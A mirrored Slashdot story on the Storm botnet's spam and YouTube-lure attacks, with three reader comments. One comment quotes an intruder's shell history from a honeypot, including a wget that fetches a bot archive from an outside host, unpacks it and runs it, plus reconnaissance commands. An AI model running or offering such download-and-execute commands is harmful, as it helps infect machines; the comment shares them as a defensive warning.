Slashdot Mirror

← Back to Stories (view on slashdot.org)

Storm Botnet Is Behind Two New Attacks

Posted by kdawson on from the do-not-click-here dept.

We've gotten a number of submissions about the new tricks the massive Storm botnet has been up to. Estimates of the size of this botnet range from 250K-1M to 5M-10M compromised machines. Reader cottagetrees notes a writeup at Exploit Prevention Labs on a new social engineering attack involving YouTube. The emails, which may be targeted at people who use private domain registrations, warn the recipient that their "face is all over 'net" on a YouTube video. The link is to a Storm-infected bot that attacks using the Q4Rollup exploit (a package of about a dozen encrypted exploits). And reader thefickler writes that the recent wave of "confirmation spam" is also due to Storm, as was the earlier, months-long "e-card from a friend" series of attack emails.

3 of 226 comments (clear)

  1. I had a 500% increase in Spam on Tuesday Last Week by Jennifer+York · · Score: 4, Interesting
    I wonder if the huge spike in spam from Tuesday is at all related to this botnet... It was crushing, we had so many users complaining about slow mail service, and it was traced back to a maxed out mail server diligently blocking the spam. The storm passed by Wednesday, but it did so us that we need to upgrade our infrastructure.

    I fscking hate SPAM!

    --
    Dominant Meme
  2. Re:Ha! by cp.tar · · Score: 3, Interesting

    Well, one point in favour of Linux security is the central software repository for each and every distro.

    Linux users typically will not - even when the popularity of Linux rises - install random cursors, free smilies and whatnot - simply because they'll be used to installing things from the repository.

    And it's quite simple to hammer that into people's heads: the software from the repository is safe. Other software is not.

    There is still nothing similar in the Windows world.

    --
    Ignore this signature. By order.
  3. It's not just windows they're exploiting... by nick13245 · · Score: 5, Interesting

    For instance, here's a recent attack to my honeypot (Running Slackware Linux)

    root@zomg:~# cat /home/webmaster/. ./ .bash_history .ssh/ ../ .screenrc .xsession
    root@zomg:~# cat /home/webmaster/.bash_history
    ssh localhost
    w
    cat /etc/hosts
    cat /proc/cpuinfo
    passwd
    cd /var/tmp
    ks
    l
    sl
    ls
    ls- all
    ls -all
    mkdir " "
    cd " "
    clear
    wget imaginez0r.xhost.ro/botme.tar.gz
    tar zxvf botme.tar.gz
    rm -rf botme.tar.gz
    cd .bot/
    PATH=.:$PATH
    bash

    These kind of attacks happen every day, sometimes more than once a day. If you don't patch and secure your machine, or do stupid things like download and run binaries, it's gonna get owned. Doesn't matter what OS you run.